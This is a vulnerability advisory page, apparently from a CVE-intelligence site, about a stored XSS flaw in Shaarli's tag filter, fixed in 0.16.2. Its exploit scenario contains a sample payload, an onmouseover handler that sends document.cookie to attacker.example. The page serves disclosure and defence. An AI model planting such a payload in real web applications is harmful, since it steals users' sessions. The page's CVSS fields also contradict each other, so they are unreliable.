Severity by source
AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N
Stored XSS is network-delivered to victim browsers (AV:N); any authenticated account can plant the payload (PR:L); victim browser session constitutes a changed scope (S:C); no availability impact applies.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
Shaarli is a personal bookmarking service. Versions 0.16.1 and prior contain a stored Cross-Site Scripting (XSS) vulnerability in the tag filtering functionality of Shaarli. An authenticated user can inject arbitrary JavaScript into the tags field when creating a bookmark (Shaare). The malicious payload is stored and later executed when users interact with the "Filter by tag" search feature on the homepage. User-supplied input in the tags field is not properly sanitized or output-escaped before being rendered in the tag filtering interface. When a bookmark is created with a malicious payload inside the tag field, the payload is stored in the database. Later, when a user searches using the "Filter by tag" functionality on the homepage, the application renders matching tags dynamically. If the tag value contains HTML with JavaScript event handlers, it is injected into the DOM. This impacts anyone interacting with the "Filter by tag" search functionality, administrators and privileged users. This issue has been fixed in version 0.16.2.
AnalysisAI
Stored XSS in Shaarli's tag filtering functionality permits an authenticated user to inject persistent JavaScript payloads via the bookmark tags field, which execute in the browsers of any user who subsequently interacts with the 'Filter by tag' search feature on the homepage. All Shaarli deployments running version 0.16.1 or earlier are affected, including instances where administrators use the tag-filter feature. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Two concrete sequential conditions are required. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The NVD-assigned CVSS 3.1 vector CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N yields a score of 4.8, but the AV:L (Local) designation is anomalous and inconsistent with a stored XSS vulnerability in a web application - the attack is delivered over a network to a victim's browser, not via local system access. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An authenticated Shaarli user creates a bookmark with a tag value containing an HTML event handler payload such as onmouseover=fetch('https://attacker.example/?c='+document.cookie). The tag is stored in the database as-is. … |
| Remediation | Upgrade to Shaarli v0.16.2, released 2026-05-23, which resolves this vulnerability by encoding tag text in Awesomplete autocomplete suggestions and applies additional XSS fixes for Markdown href sanitization and thumbnail DOM insertions. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Reflected Cross Site Scripting (XSS) vulnerability in Shaarli v0.12.2, allows remote attackers to execute arbitrary code
Stored XSS in Shaarli versions before 0.16.0 allows authenticated attackers to inject malicious HTML by crafting tags st
Reflected XSS vulnerability in Shaarli v0.9.1 allows an unauthenticated attacker to inject JavaScript via the searchtags
Cross-site scripting (XSS) vulnerability in Shaarli before 0.8.5 and 0.9.x before 0.9.3 allows remote attackers to injec
DOM-based XSS in Shaarli's Thumbnail Synchronizer allows stored malicious bookmark titles to execute arbitrary JavaScrip
Stored XSS in Shaarli's Markdown rendering pipeline (versions 0.16.1 and prior) allows an authenticated user to inject m
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today